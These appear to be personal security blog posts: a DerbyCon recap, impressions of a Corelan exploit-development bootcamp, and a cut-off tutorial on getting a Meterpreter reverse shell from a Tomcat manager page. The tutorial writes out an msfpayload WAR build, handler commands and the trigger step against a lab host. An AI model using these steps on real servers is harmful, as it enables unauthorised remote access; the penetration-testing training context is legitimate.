Derbycon + sleepiness = Good Times!!

I had a great time at DerbyCon, I am already looking forward to next year. I hope to be ready to submit a talk, as the stats are at 57% for new speakers, makes me want to get my butt in gear and find the inspiration to do some research.

This pretty much sums up my DerbyCon experience! Great time at the Friday Night party. Awesome time speaking with Int80 from DualCore. He is the coolest marthafocka on the planet!

Int80 from Dual Core
Int80 from Dual Core

And of course, me not being able to keep my eyes open during lunch.

sleepy

There was some talk about it being over crowded. I didn’t really notice, honestly after the first two days of the Corelan class the rest of the con was mostly a blur. I am afraid of the mass panic that it might cause next year with ticket purchases. Of course as Derbycon grows each year, I probably will be glad that they are capping off the tickets. My wife pointed out that there were a lot more females this year, I guess I didn’t notice until a group of them went to lunch and then all of a sudden she was pointing out all of her new Con Buddies. My wife had a great time and she is not a techy, but she loved going to the SE talks and meeting new people. This con always had this great family feel, I received several hugs this past week, even from Re1ik himself. haha! My wife talked with Larry Pesce about ear gauging and other things. But this proves one thing, DerbyCon is a great con and if you have not been able to make it out to one, I really would suggest attempting to. There are no egos, everyone was definitely approachable and once the beer started to flow, that became even more so. I am hoping to do the triple crown next year, which consists of DerbyCon in Kentucky, HackerCon in WV, and SkyDogCon in TN. If I play my cards right, maybe I will get a chance to speak at all 3.

As always, IronGeek will have all the videos up soon, I cant wait to check out the talks that I missed. Anyway, as for the blog, in my crazy attempt to post at least once a week, I plan on doing some video blogs pretty soon. I always come back from a Con with tons of stuff I want to do.

I met some great people this year, I spoke quite a bit with the guys that run the Good Samaritan Project; If you can or want to help out contact these guys and see how you can do some good with your GoogleFu. Also, check out Hackers for Charity, they are trying to do some good in this world and I finally had a chance to sign up to help out locally.

Until next time….HACK ALL THE THINGS, DRINK ALL THE BOOZE!!!!

Hell Day 2 aka Corelan Win 32 Exploit Dev Bootcamp Day 2

Wow, we didn’t get out until 2am and everyone looked exhausted or defeated. hah! No really, day 2 was really fast paced. We covered tons of stuff (e.g. tons of seh and advanced mitigation bypass, writing metasploit modules, browser and heap stuff) and as I stated in the post about day 1, you really need to have some idea of what you are doing. Diving deep into Mona.py and the powerful features of Windbg (providing that your machine doesn’t crap out or you cant download your symbol files correctly sighs). However, you don’t have to be a pro at this stuff, it helps but not necessary. Corelan was/is a great teacher, and the teaching assistants were great; it is rare to have a great teacher and a course where the aids know quite a bit about the topics. He even went further to mention his site and forums, as well as the special forums we get as students of the course; if access to the special forums is the only thing you get from this class then that is enough. Lincoln and _sinner were great aids and helped me out a bit during the course with little tidbits. It was also nice to know that some of my ExDev “habits” were shared with them. haha!

Take away from the entire training:
I have made a commitment to myself to work on 1 exploit a week. These will be taking various things from MSF and Exploitdb and converting them to python and hopefully msf. I will hopefully make a blog or two about my experiences and progress. Also, during this time I will be focusing back on OSCE and hopefully by November or December I will sit for the test. Corelan really stressed the fact that he worked on 2 exploits a week to keep at this stuff, because it is not his day job. Which really shocked me, but gave me motivation. It is amazing how much I have learned in this course and even though it was a rough course I would take it again. In fact I may depending on my schedule and financial responsibilities, in a year or so, just to see where I am. This course will definitely teach you how to think and basic troubleshooting of your code. He also provided a few scripts to help with different things ( outside of what mona can do). muahahah! I think the biggest thing I got from this course is not giving up! I got really frustrated when things were landing right in my exploits, but taking a step back and looking at my mistakes really taught me to just be patient and it is probably something simple that I am missing.

If you have a chance to take the course, you wont regret it. Oh, stop using NOPs in your exploit. haha! Prepare for pain and long nights. Have a beer or a few shots to calm your nerves and don’t give up.

Back to DerbyCon!!!

DerbyCon + Corelan Win32 Exploit Dev Bootcamp Day 1 = OMG!

I am having such a killer time at DerbyCon. It has only been a day and I have already met new people and am seeing a lot of familiar faces from last year. I love small cons, mainly this one, because no one seems to have an ego here and everyone is just chill. I highly recommend coming out to DerbyCon if you have a chance. Also, remember to try the Burbon Beer from the Sway lounge, its my fav.

Anyway, the real reason for this post. The Corelan bootcamp is everything I thought it would be. We went from 0-60 in no time. We started at 830am and didn’t finish until Midnight, mostly because everyone in class was dead tired and couldn’t finish the last module of day 1. The first exploit lab has a lot of gotchas that will challenge the way you think; no its not your typical FTP server exploit. He really stressed about all the bad habits we n00bs learn from just doing random tutorials around the interwebs. Its crazy, how many times I have done exploits using ‘NOPS’ and the first thing he says in class is ” NOPS are for lazy a*holes” and then started to explain to us why we shouldn’t use them. However, there is a place and a time where you can use them, but the majority of the time you shouldn’t use them. Troubleshooting your programs is a more efficient way to learning and challenging yourself. I have noticed that the more I am moving into Exploit Dev there are a 1000 ways to skin a cat and now I am trying to soak in all the information. I would say that if you have followed his tutorials  then you should have a good understanding of how basic Stack Based overflows work. However, I would go over the material a few times, and actually attempt to do the higher level stuff (e.g. Heap, SEH, DEP, and ASLR). I would not be scared to take the class, even though it is a difficult class, Corelan does a really good job of explaining the material and making sure you are understanding the fundamentals. Sometimes, we as n00bs, just follow directions and really have no idea why we are doing certain things. Corelan spent a good chunk of day 1 covering the basics before we jumped into labs.

<

p>If you are thinking about taking the the OSCE or the AWE, I would definitely figure out a way to take Corelan’s course first. I already feel a lot more comfortable doing Exploit Dev and working in a debugger. Of course even to sign up for the OSCE I would suggest that you know your way around the debugger, but its nice to know that all my practice is really helping. Again, I would not be scared to take this course if you are just starting out. I think going through the many tutorials on the Net and his tutorials will really give you a great start. However, I would say know python or at least be familiar with it.  My plans are to work through this course material and then jump back into OSCE mode.

Anyway, I am going to grab breakfast and get ready for Day 2 aka “Hell Day 2”.

Abusing Tomcat + Set + Sleepy Hollow = Fun!

You know, the best kind of war is a war where no one gets hurt and you wind up with a shell. I was surfing the Interwebz and I found tons of tutorials on creating War files for Tomcat and they were for the most part great. But like most things in Pen Testing, what happens when things don’t go as planned? We have to make sure we adapt and still find a way to get our shell. For the record, this post has nothing to do with Sleepy Hollow, I was preparing to watch the premiere when I started to write this post. haha!

Well, to revisit this shortly, say that we are on a test. We have identified several Tomcat servers and figured out a way to get the passwords, whether they are using the default “tomcat/tomcat” credentials or something similar. The first thing I would verify is if I am able to access the “manager/html” page. If you are familiar with this page, we know that if the user has permissions, we can deploy War files and other servlets in hopes of getting a shell. But when on a test, we can face many problems:

1). The user role does not have permission to deploy your files.
2). The version of Java on the victim and your metasploit shell is not playing nice.
3). The Pen Test Gods really hate you!

No matter the answer, less pain is better. I will go over the quick basics of creating a war file and deploying it.

Scenario Setup:
Victim: Windows XP Box -Apache Tomcat/7.0.42(Version installed with XAMPP) @192.168.160.131
Attacker: Kali 32bit @192.168.160.155

When you log into the manager, you are presented with an option to view the folders/applications and/or deploy files. You can easily build a war file using metasploit and then see if your user has permissions to deploy the file.

Option 1
Build your War file:


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.160.157 LPORT=5656 W > tu3.war

Start your handler:


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.160.157
LHOST => 192.168.160.155
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 5656
LPORT => 5656
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.160.157:5656
[*] Starting the payload handler...
msf exploit(handler) >

Ok now that we have that part, lets deploy our war file and try to get a shell.

When you go into the manager, you have the option to “Browse [for your file]->Deploy”. That was easy, however if you click the folder you get may receive a “404” or in some cases you may get a shell and then it quits right away. What we can do in this case is dive into the war file and find out the name of the “.jsp” file. Now we can force that file to run and hopefully give us a shell.


root@kali:~/tutorials/tomcat# unzip -l tu3.war
Archive: tu3.war
Length Date Time Name
--------- ---------- ----- ----
0 2013-09-19 21:43 META-INF/
71 2013-09-19 21:43 META-INF/MANIFEST.MF
0 2013-09-19 21:43 WEB-INF/
268 2013-09-19 21:43 WEB-INF/web.xml
1589 2013-09-19 21:43 unovqmyva.jsp
147604 2013-09-19 21:43 ffFKxwsQnlyLP.txt
--------- -------
149532 6 files

As you can see, metasploit randomly names the “.jsp” file, so all we need to do — crosses fingers —is browse to that file and get a shell.


http:// Continue reading Abusing Tomcat + Set + Sleepy Hollow = Fun!